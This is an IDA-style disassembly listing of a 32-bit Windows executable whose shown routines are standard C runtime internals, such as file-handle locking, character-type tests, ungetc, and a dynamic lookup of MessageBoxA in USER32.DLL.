; =============== S U B R O U T I N E =======================================
sub_40EC54 proc near ; CODE XREF: sub_40BEF0+1E�p
; sub_40BEF0+40�p
push ebx
push ecx
mov ebx, offset dword_423FB0
jmp short loc_40EC68
sub_40EC54 endp
; =============== S U B R O U T I N E =======================================
sub_40EC5D proc near ; CODE XREF: sub_4085C8+6E�p
; sub_406640+2099�p ...
arg_0 = dword ptr 4
push ebx
push ecx
mov ebx, offset dword_423FB0
mov ecx, [esp+8+arg_0]
loc_40EC68: ; CODE XREF: sub_40EC54+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
push ebp
push ecx
push eax
pop eax
pop ecx
pop ebp
pop ecx
pop ebx
retn 4
sub_40EC5D endp
; =============== S U B R O U T I N E =======================================
sub_40EC7C proc near ; CODE XREF: sub_4085C8+7B�p
; sub_40EBAD+6B�p
call eax
retn
sub_40EC7C endp
; =============== S U B R O U T I N E =======================================
sub_40EC7F proc near ; CODE XREF: sub_40E072+2BB�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
test eax, eax
push esi
push edi
jl short loc_40ECE3
cmp eax, ds:dword_433C84
jnb short loc_40ECE3
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, eax
sar ecx, 5
lea edi, ds:433CA0h[ecx*4]
mov ecx, [edi]
cmp dword ptr [esi+ecx], 0FFFFFFFFh
jnz short loc_40ECE3
cmp ds:dword_423050, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_40ECD9
sub eax, 0
jz short loc_40ECD0
dec eax
jz short loc_40ECCB
dec eax
jnz short loc_40ECD9
push ebx
push 0FFFFFFF4h
jmp short loc_40ECD3
; ---------------------------------------------------------------------------
loc_40ECCB: ; CODE XREF: sub_40EC7F+42�j
push ebx
push 0FFFFFFF5h
jmp short loc_40ECD3
; ---------------------------------------------------------------------------
loc_40ECD0: ; CODE XREF: sub_40EC7F+3F�j
push ebx
push 0FFFFFFF6h
loc_40ECD3: ; CODE XREF: sub_40EC7F+4A�j
; sub_40EC7F+4F�j
call ds:dword_41D0BC
loc_40ECD9: ; CODE XREF: sub_40EC7F+3A�j
; sub_40EC7F+45�j
mov eax, [edi]
mov [esi+eax], ebx
xor eax, eax
pop ebx
jmp short loc_40ECF9
; ---------------------------------------------------------------------------
loc_40ECE3: ; CODE XREF: sub_40EC7F+8�j
; sub_40EC7F+10�j ...
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_40ECF9: ; CODE XREF: sub_40EC7F+62�j
pop edi
pop esi
retn
sub_40EC7F endp
; =============== S U B R O U T I N E =======================================
sub_40ECFC proc near ; CODE XREF: sub_408A4D+62�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push ebx
xor ebx, ebx
cmp ecx, ebx
push esi
push edi
jl short loc_40ED64
cmp ecx, ds:dword_433C84
jnb short loc_40ED64
mov esi, ecx
and esi, 1Fh
imul esi, 28h
mov eax, ecx
sar eax, 5
lea edi, ds:433CA0h[eax*4]
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_40ED64
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_40ED64
cmp ds:dword_423050, 1
jnz short loc_40ED5A
sub ecx, ebx
jz short loc_40ED51
dec ecx
jz short loc_40ED4C
dec ecx
jnz short loc_40ED5A
push ebx
push 0FFFFFFF4h
jmp short loc_40ED54
; ---------------------------------------------------------------------------
loc_40ED4C: ; CODE XREF: sub_40ECFC+46�j
push ebx
push 0FFFFFFF5h
jmp short loc_40ED54
; ---------------------------------------------------------------------------
loc_40ED51: ; CODE XREF: sub_40ECFC+43�j
push ebx
push 0FFFFFFF6h
loc_40ED54: ; CODE XREF: sub_40ECFC+4E�j
; sub_40ECFC+53�j
call ds:dword_41D0BC
loc_40ED5A: ; CODE XREF: sub_40ECFC+3F�j
; sub_40ECFC+49�j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_40ED79
; ---------------------------------------------------------------------------
loc_40ED64: ; CODE XREF: sub_40ECFC+B�j
; sub_40ECFC+13�j ...
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], ebx
or eax, 0FFFFFFFFh
loc_40ED79: ; CODE XREF: sub_40ECFC+66�j
pop edi
pop esi
pop ebx
retn
sub_40ECFC endp
; =============== S U B R O U T I N E =======================================
sub_40ED7D proc near ; CODE XREF: sub_408A4D+7�p
; sub_408A4D+2F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40ED9D
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40ED9D: ; CODE XREF: sub_40ED7D+7�j
push esi
xor esi, esi
cmp eax, esi
jl short loc_40EDC6
cmp eax, ds:dword_433C84
jnb short loc_40EDC6
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
add eax, ecx
test byte ptr [eax+4], 1
jnz short loc_40EDEA
loc_40EDC6: ; CODE XREF: sub_40ED7D+25�j
; sub_40ED7D+2D�j
call sub_4057E6
mov [eax], esi
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 9
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EDEA: ; CODE XREF: sub_40ED7D+47�j
mov eax, [eax]
pop esi
retn
sub_40ED7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EDEE proc near ; CODE XREF: sub_408AE1+7F�p
; sub_40A34F+7F�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421880
call __SEH_prolog4
mov edi, [ebp+arg_0]
mov eax, edi
sar eax, 5
mov esi, edi
and esi, 1Fh
imul esi, 28h
add esi, ds:dword_433CA0[eax*4]
mov [ebp+var_1C], 1
xor ebx, ebx
cmp [esi+8], ebx
jnz short loc_40EE55
push 0Ah
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi+8], ebx
jnz short loc_40EE49
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jnz short loc_40EE46
mov [ebp+var_1C], ebx
loc_40EE46: ; CODE XREF: sub_40EDEE+53�j
inc dword ptr [esi+8]
loc_40EE49: ; CODE XREF: sub_40EDEE+3F�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40EE85
loc_40EE55: ; CODE XREF: sub_40EDEE+2F�j
cmp [ebp+var_1C], ebx
jz short loc_40EE77
mov eax, edi
sar eax, 5
and edi, 1Fh
imul edi, 28h
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+edi+0Ch]
push eax
call ds:dword_41D168
loc_40EE77: ; CODE XREF: sub_40EDEE+6A�j
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40EDEE endp
; =============== S U B R O U T I N E =======================================
sub_40EE80 proc near ; DATA XREF: .kSjx934:00421898�o
xor ebx, ebx
mov edi, [ebp+8]
sub_40EE80 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40EE85 proc near ; CODE XREF: sub_40EDEE+62�p
push 0Ah
call sub_40591F
pop ecx
retn
sub_40EE85 endp
; =============== S U B R O U T I N E =======================================
sub_40EE8E proc near ; CODE XREF: sub_408BA4+3�p
; sub_40A421+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
lea eax, [ecx+eax+0Ch]
push eax
call ds:dword_41D16C
retn
sub_40EE8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EEB0 proc near ; CODE XREF: sub_40E072:loc_40E268�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 0040EF8C SIZE 000000BA BYTES
push 18h
push offset dword_4218A0
call __SEH_prolog4
or [ebp+var_1C], 0FFFFFFFFh
xor edi, edi
mov [ebp+var_24], edi
push 0Bh
call sub_405934
pop ecx
test eax, eax
jnz short loc_40EED9
or eax, 0FFFFFFFFh
jmp loc_40F040
; ---------------------------------------------------------------------------
loc_40EED9: ; CODE XREF: sub_40EEB0+1F�j
push 0Bh
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
loc_40EEE4: ; CODE XREF: sub_40EEB0+109�j
mov [ebp+var_28], edi
cmp edi, 40h
jge loc_40F031
mov esi, ds:dword_433CA0[edi*4]
test esi, esi
jz loc_40EFBE
loc_40EEFF: ; CODE XREF: sub_40EEB0+CB�j
mov [ebp+var_20], esi
mov eax, ds:dword_433CA0[edi*4]
add eax, 500h
cmp esi, eax
jnb loc_40EFB2
test byte ptr [esi+4], 1
jnz short loc_40EF78
cmp dword ptr [esi+8], 0
jnz short loc_40EF5B
push 0Ah
call sub_4059F7
pop ecx
xor ebx, ebx
inc ebx
mov [ebp+ms_exc.disabled], ebx
cmp dword ptr [esi+8], 0
jnz short loc_40EF52
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jnz short loc_40EF4F
mov [ebp+var_24], ebx
jmp short loc_40EF52
; ---------------------------------------------------------------------------
loc_40EF4F: ; CODE XREF: sub_40EEB0+98�j
inc dword ptr [esi+8]
loc_40EF52: ; CODE XREF: sub_40EEB0+84�j
; sub_40EEB0+9D�j
and [ebp+ms_exc.disabled], 0
call sub_40EF83
loc_40EF5B: ; CODE XREF: sub_40EEB0+70�j
cmp [ebp+var_24], 0
jnz short loc_40EF78
lea ebx, [esi+0Ch]
push ebx
call ds:dword_41D168
test byte ptr [esi+4], 1
jz short loc_40EF8C
push ebx
call ds:dword_41D16C
loc_40EF78: ; CODE XREF: sub_40EEB0+6A�j
; sub_40EEB0+AF�j ...
add esi, 28h
jmp short loc_40EEFF
sub_40EEB0 endp
; =============== S U B R O U T I N E =======================================
sub_40EF7D proc near ; DATA XREF: .kSjx934:004218C4�o
mov edi, [ebp-28h]
mov esi, [ebp-20h]
sub_40EF7D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40EF83 proc near ; CODE XREF: sub_40EEB0+A6�p
push 0Ah
call sub_40591F
pop ecx
retn
sub_40EF83 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40EEB0
loc_40EF8C: ; CODE XREF: sub_40EEB0+BF�j
cmp [ebp+var_24], 0
jnz short loc_40EF78
mov byte ptr [esi+4], 1
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, ds:dword_433CA0[edi*4]
cdq
push 28h
pop ecx
idiv ecx
mov ecx, edi
shl ecx, 5
add eax, ecx
mov [ebp+var_1C], eax
loc_40EFB2: ; CODE XREF: sub_40EEB0+60�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_40F031
inc edi
jmp loc_40EEE4
; ---------------------------------------------------------------------------
loc_40EFBE: ; CODE XREF: sub_40EEB0+49�j
push 28h
push 20h
call sub_40777A
pop ecx
pop ecx
mov [ebp+var_20], eax
test eax, eax
jz short loc_40F031
lea ecx, ds:433CA0h[edi*4]
mov [ecx], eax
add ds:dword_433C84, 20h
loc_40EFE0: ; CODE XREF: sub_40EEB0+151�j
mov edx, [ecx]
add edx, 500h
cmp eax, edx
jnb short loc_40F003
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
and dword ptr [eax+8], 0
add eax, 28h
mov [ebp+var_20], eax
jmp short loc_40EFE0
; ---------------------------------------------------------------------------
loc_40F003: ; CODE XREF: sub_40EEB0+13A�j
shl edi, 5
mov [ebp+var_1C], edi
mov eax, edi
sar eax, 5
mov ecx, edi
and ecx, 1Fh
imul ecx, 28h
mov eax, ds:dword_433CA0[eax*4]
mov byte ptr [eax+ecx+4], 1
push edi
call sub_40EDEE
pop ecx
test eax, eax
jnz short loc_40F031
or [ebp+var_1C], 0FFFFFFFFh
loc_40F031: ; CODE XREF: sub_40EEB0+3A�j
; sub_40EEB0+106�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40F046
mov eax, [ebp+var_1C]
loc_40F040: ; CODE XREF: sub_40EEB0+24�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40EEB0
; =============== S U B R O U T I N E =======================================
sub_40F046 proc near ; CODE XREF: sub_40EEB0+188�p
; DATA XREF: .kSjx934:004218B8�o
push 0Bh
call sub_40591F
pop ecx
retn
sub_40F046 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F04F proc near ; CODE XREF: sub_408C3C+31�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_4218C8
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40F076
call sub_4057D3
mov dword ptr [eax], 9
loc_40F06E: ; CODE XREF: sub_40F04F+4D�j
or eax, 0FFFFFFFFh
jmp loc_40F120
; ---------------------------------------------------------------------------
loc_40F076: ; CODE XREF: sub_40F04F+12�j
xor ebx, ebx
cmp eax, ebx
jl short loc_40F084
cmp eax, ds:dword_433C84
jb short loc_40F09E
loc_40F084: ; CODE XREF: sub_40F04F+2B�j
; sub_40F04F+6D�j
call sub_4057D3
mov dword ptr [eax], 9
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
jmp short loc_40F06E
; ---------------------------------------------------------------------------
loc_40F09E: ; CODE XREF: sub_40F04F+33�j
mov ecx, eax
sar ecx, 5
lea edi, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [edi]
movzx ecx, byte ptr [esi+ecx+4]
and ecx, 1
jz short loc_40F084
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], ebx
mov eax, [edi]
test byte ptr [esi+eax+4], 1
jz short loc_40F102
push [ebp+arg_0]
call sub_40ED7D
pop ecx
push eax
call ds:dword_41D0B8
test eax, eax
jnz short loc_40F0F0
call ds:dword_41D0F0
mov [ebp+var_1C], eax
jmp short loc_40F0F3
; ---------------------------------------------------------------------------
loc_40F0F0: ; CODE XREF: sub_40F04F+94�j
mov [ebp+var_1C], ebx
loc_40F0F3: ; CODE XREF: sub_40F04F+9F�j
cmp [ebp+var_1C], ebx
jz short loc_40F111
call sub_4057E6
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_40F102: ; CODE XREF: sub_40F04F+80�j
call sub_4057D3
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_40F111: ; CODE XREF: sub_40F04F+A7�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40F126
mov eax, [ebp+var_1C]
loc_40F120: ; CODE XREF: sub_40F04F+22�j
call __SEH_epilog4
retn
sub_40F04F endp
; =============== S U B R O U T I N E =======================================
sub_40F126 proc near ; CODE XREF: sub_40F04F+C9�p
; DATA XREF: .kSjx934:004218E0�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40F126 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F130 proc near ; CODE XREF: sub_40F17F+21�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F160
lea eax, [ebp+var_10]
push eax
push 4
push [ebp+arg_0]
call sub_40CA44
add esp, 0Ch
jmp short loc_40F170
; ---------------------------------------------------------------------------
loc_40F160: ; CODE XREF: sub_40F130+1B�j
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 4
loc_40F170: ; CODE XREF: sub_40F130+2E�j
cmp [ebp+var_4], 0
jz short locret_40F17D
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F17D: ; CODE XREF: sub_40F130+44�j
leave
retn
sub_40F130 endp
; =============== S U B R O U T I N E =======================================
sub_40F17F proc near ; CODE XREF: .kSjx934:0040901D�p
; .kSjx934:00409256�p ...
arg_0 = dword ptr 4
cmp ds:dword_425DE0, 0
jnz short loc_40F19A
mov eax, [esp+arg_0]
mov ecx, ds:off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
retn
; ---------------------------------------------------------------------------
loc_40F19A: ; CODE XREF: sub_40F17F+7�j
push 0
push [esp+4+arg_0]
call sub_40F130
pop ecx
pop ecx
retn
sub_40F17F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F1A8 proc near ; CODE XREF: sub_40F1FC+23�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F1DB
lea eax, [ebp+var_10]
push eax
push 80h
push [ebp+arg_0]
call sub_40CA44
add esp, 0Ch
jmp short loc_40F1ED
; ---------------------------------------------------------------------------
loc_40F1DB: ; CODE XREF: sub_40F1A8+1B�j
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 80h
loc_40F1ED: ; CODE XREF: sub_40F1A8+31�j
cmp [ebp+var_4], 0
jz short locret_40F1FA
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F1FA: ; CODE XREF: sub_40F1A8+49�j
leave
retn
sub_40F1A8 endp
; =============== S U B R O U T I N E =======================================
sub_40F1FC proc near ; CODE XREF: .kSjx934:00409846�p
; .kSjx934:0040991E�p
arg_0 = dword ptr 4
cmp ds:dword_425DE0, 0
jnz short loc_40F219
mov eax, [esp+arg_0]
mov ecx, ds:off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 80h
retn
; ---------------------------------------------------------------------------
loc_40F219: ; CODE XREF: sub_40F1FC+7�j
push 0
push [esp+4+arg_0]
call sub_40F1A8
pop ecx
pop ecx
retn
sub_40F1FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F227 proc near ; CODE XREF: sub_40F276+21�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F257
lea eax, [ebp+var_10]
push eax
push 8
push [ebp+arg_0]
call sub_40CA44
add esp, 0Ch
jmp short loc_40F267
; ---------------------------------------------------------------------------
loc_40F257: ; CODE XREF: sub_40F227+1B�j
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
loc_40F267: ; CODE XREF: sub_40F227+2E�j
cmp [ebp+var_4], 0
jz short locret_40F274
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F274: ; CODE XREF: sub_40F227+44�j
leave
retn
sub_40F227 endp
; =============== S U B R O U T I N E =======================================
sub_40F276 proc near ; CODE XREF: sub_408E42+17�p
; .kSjx934:00408FA3�p ...
arg_0 = dword ptr 4
cmp ds:dword_425DE0, 0
jnz short loc_40F291
mov eax, [esp+arg_0]
mov ecx, ds:off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
retn
; ---------------------------------------------------------------------------
loc_40F291: ; CODE XREF: sub_40F276+7�j
push 0
push [esp+4+arg_0]
call sub_40F227
pop ecx
pop ecx
retn
sub_40F276 endp
; =============== S U B R O U T I N E =======================================
sub_40F29F proc near ; CODE XREF: .kSjx934:00408FC5�p
; .kSjx934:00409425�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_4]
or ebp, 0FFFFFFFFh
test byte ptr [esi+0Ch], 40h
push edi
jnz loc_40F35C
push esi
call sub_408A20
cmp eax, ebp
pop ecx
mov ebx, offset dword_423BD0
jz short loc_40F2F2
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_40F2F2
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_40F2F4
; ---------------------------------------------------------------------------
loc_40F2F2: ; CODE XREF: sub_40F29F+23�j
; sub_40F29F+2F�j
mov eax, ebx
loc_40F2F4: ; CODE XREF: sub_40F29F+51�j
test byte ptr [eax+24h], 7Fh
jnz short loc_40F33B
push esi
call sub_408A20
cmp eax, ebp
pop ecx
jz short loc_40F333
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_40F333
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_40F335
; ---------------------------------------------------------------------------
loc_40F333: ; CODE XREF: sub_40F29F+64�j
; sub_40F29F+70�j
mov eax, ebx
loc_40F335: ; CODE XREF: sub_40F29F+92�j
test byte ptr [eax+24h], 80h
jz short loc_40F35C
loc_40F33B: ; CODE XREF: sub_40F29F+59�j
call sub_4057D3
xor edi, edi
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
loc_40F355: ; CODE XREF: sub_40F29F+C3�j
; sub_40F29F+CE�j ...
mov eax, ebp
loc_40F357: ; CODE XREF: sub_40F29F+11C�j
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40F35C: ; CODE XREF: sub_40F29F+F�j
; sub_40F29F+9A�j
mov ebx, [esp+10h+arg_0]
cmp ebx, ebp
jz short loc_40F355
mov eax, [esi+0Ch]
test al, 1
jnz short loc_40F373
test al, al
jns short loc_40F355
test al, 2
jnz short loc_40F355
loc_40F373: ; CODE XREF: sub_40F29F+CA�j
xor edi, edi
cmp [esi+8], edi
jnz short loc_40F381
push esi
call sub_40D4FC
pop ecx
loc_40F381: ; CODE XREF: sub_40F29F+D9�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_40F390
cmp [esi+4], edi
jnz short loc_40F355
inc eax
mov [esi], eax
loc_40F390: ; CODE XREF: sub_40F29F+E7�j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_40F3A3
cmp [eax], bl
jz short loc_40F3A5
inc eax
mov [esi], eax
jmp short loc_40F355
; ---------------------------------------------------------------------------
loc_40F3A3: ; CODE XREF: sub_40F29F+F9�j
mov [eax], bl
loc_40F3A5: ; CODE XREF: sub_40F29F+FD�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_40F357
sub_40F29F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3BD proc near ; CODE XREF: .kSjx934:00409566�p
; sub_40F4D0+E�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_40F3E1
cmp [ebp+arg_8], ebx
jz short loc_40F3E1
cmp [esi], bl
jnz short loc_40F3E7
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40F3E1
mov [eax], bx
loc_40F3E1: ; CODE XREF: sub_40F3BD+F�j
; sub_40F3BD+14�j ...
xor eax, eax
loc_40F3E3: ; CODE XREF: sub_40F3BD+5A�j
; sub_40F3BD+BB�j ...
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40F3E7: ; CODE XREF: sub_40F3BD+18�j
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_40F419
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40F408
movzx cx, byte ptr [esi]
mov [eax], cx
loc_40F408: ; CODE XREF: sub_40F3BD+42�j
; sub_40F3BD+10B�j
cmp [ebp+var_4], bl
jz short loc_40F414
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40F414: ; CODE XREF: sub_40F3BD+4E�j
xor eax, eax
inc eax
jmp short loc_40F3E3
; ---------------------------------------------------------------------------
loc_40F419: ; CODE XREF: sub_40F3BD+3B�j
lea eax, [ebp+var_10]
push eax
movzx eax, byte ptr [esi]
push eax
call sub_40CA00
test eax, eax
pop ecx
pop ecx
jz short loc_40F4A9
mov eax, [ebp+var_10]
mov ecx, [eax+0ACh]
cmp ecx, 1
jle short loc_40F45F
cmp [ebp+arg_8], ecx
jl short loc_40F45F
xor edx, edx
cmp [ebp+arg_0], ebx
setnz dl
push edx
push [ebp+arg_0]
push ecx
push esi
push 9
push dword ptr [eax+4]
call ds:dword_41D0A0
test eax, eax
mov eax, [ebp+var_10]
jnz short loc_40F46F
loc_40F45F: ; CODE XREF: sub_40F3BD+7B�j
; sub_40F3BD+80�j
mov ecx, [ebp+arg_8]
cmp ecx, [eax+0ACh]
jb short loc_40F48A
cmp [esi+1], bl
jz short loc_40F48A
loc_40F46F: ; CODE XREF: sub_40F3BD+A0�j
cmp [ebp+var_4], bl
mov eax, [eax+0ACh]
jz loc_40F3E3
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40F3E3
; ---------------------------------------------------------------------------
loc_40F48A: ; CODE XREF: sub_40F3BD+AB�j
; sub_40F3BD+B0�j ...
call sub_4057D3
mov dword ptr [eax], 2Ah
cmp [ebp+var_4], bl
jz short loc_40F4A1
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40F4A1: ; CODE XREF: sub_40F3BD+DB�j
or eax, 0FFFFFFFFh
jmp loc_40F3E3
; ---------------------------------------------------------------------------
loc_40F4A9: ; CODE XREF: sub_40F3BD+6D�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
mov eax, [ebp+var_10]
push 1
push esi
push 9
push dword ptr [eax+4]
call ds:dword_41D0A0
test eax, eax
jnz loc_40F408
jmp short loc_40F48A
sub_40F3BD endp
; =============== S U B R O U T I N E =======================================
sub_40F4D0 proc near ; CODE XREF: sub_40CE5A+18E�p
; sub_40CE5A+1BC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40F3BD
add esp, 10h
retn
sub_40F4D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F4F0 proc near ; CODE XREF: .kSjx934:00409836�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_40F509
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_40F509: ; CODE XREF: sub_40F4F0+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_40F4F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F524 proc near ; CODE XREF: sub_409AB4+15D�p
var_30 = dword ptr -30h
var_20 = byte ptr -20h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
call sub_40518A
xor ebx, ebx
cmp ds:dword_426488, ebx
mov [ebp+var_10], eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
jnz loc_40F5F9
push offset aUser32_dll_0 ; "USER32.DLL"
call ds:dword_41D0E8
mov edi, eax
cmp edi, ebx
jnz short loc_40F564
loc_40F55D: ; CODE XREF: sub_40F524+50�j
xor eax, eax
jmp loc_40F6BD
; ---------------------------------------------------------------------------
loc_40F564: ; CODE XREF: sub_40F524+37�j
mov esi, ds:dword_41D0EC
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi
cmp eax, ebx
jz short loc_40F55D
push eax
